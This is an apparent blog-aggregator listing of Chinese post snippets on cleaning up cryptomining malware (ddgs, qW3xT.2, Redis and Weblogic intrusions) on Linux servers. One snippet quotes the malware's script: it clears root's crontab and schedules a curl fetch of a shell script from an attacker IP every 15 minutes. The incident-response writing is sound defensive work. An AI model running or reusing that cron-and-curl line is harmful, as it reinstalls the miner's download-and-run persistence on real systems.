概要: 一、症状及表现 二、查杀方法 三、病毒分析 四、安全防护 五、参考文章 一、症状及表现 1、高CPU使用率,top命令被劫持,CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用; *注:ls top ps等命令已经被病毒的动态链接库劫持,无法正常使用,大家 ...
分类:
Web程序 时间:
2019-06-14 17:59:05
阅读次数:
363
centos下redis安全相关 博文背景: 由于发现众多同学,在使用云服务器时,安装的redis3.0+版本都关闭了protected-mode,因而都遭遇了挖矿病毒的攻击,使得服务器99%的占用率!! 因此我们在使用redis时候,最好更改默认端口,并且使用redis密码登录。 (1)redis ...
分类:
其他好文 时间:
2018-12-29 11:20:28
阅读次数:
196
centos下redis安全相关 博文背景: 由于发现众多同学,在使用云服务器时,安装的redis3.0+版本都关闭了protected-mode,因而都遭遇了挖矿病毒的攻击,使得服务器99%的占用率!! 因此我们在使用redis时候,最好更改默认端口,并且使用redis密码登录。 (1)redis ...
分类:
其他好文 时间:
2018-12-12 13:53:41
阅读次数:
189
1、 中病毒现象 此病毒基于Weblogic服务漏洞发起攻击,造成系统宕机,cpu使用率高达400%以上。 2、 查看病毒进程 Linux命令:root用户执行top命令 ,会出现.data、.conn等进程。 Windows:查看设备管理器 也是出现.data。 3、 Linux服务器解决方法 ( ...
分类:
Web程序 时间:
2018-12-05 12:16:23
阅读次数:
449
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh ... ...
分类:
其他好文 时间:
2018-10-28 00:55:51
阅读次数:
762
转自:https://blog.csdn.net/hgx13467479678/article/details/82347473 1,cpu 100%, 用top 查看cpu100 2,删掉此进程 cpu还是 100% 3,估计是进程被隐藏了 4,定时任务多了一个执行任务 5:打开连接 https: ...
分类:
其他好文 时间:
2018-10-27 15:21:07
阅读次数:
300
0x00 前言 ? 随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式。新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue)、web攻击多种漏洞(如Tomcat弱口令攻击、 ...
分类:
系统相关 时间:
2018-10-08 00:42:12
阅读次数:
231
被入侵后的现象: 发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现。 kill 掉这两个异常进程后,过一段时间看到了如下进程: 首先在/etc/sysconfig/crotnab中的定时任务没有找到定时脚本,输入crontab -e 在其中找到了该定时 ...
分类:
系统相关 时间:
2018-09-12 20:23:46
阅读次数:
272
首先杀死进程: 1.首先,将 CPU 占满的进程杀死 2.它有一个 守护进程 ps aux|grep ddg 删除文件: 1.进入/tmp文件夹下。发现qW3xT.2文件,删除。 2.删除/tmp目录下的所有的对应ddg 删除计划任务: [root@iZbp1cbg04oh74k1dexpujZ t ...
分类:
其他好文 时间:
2018-09-08 22:44:14
阅读次数:
722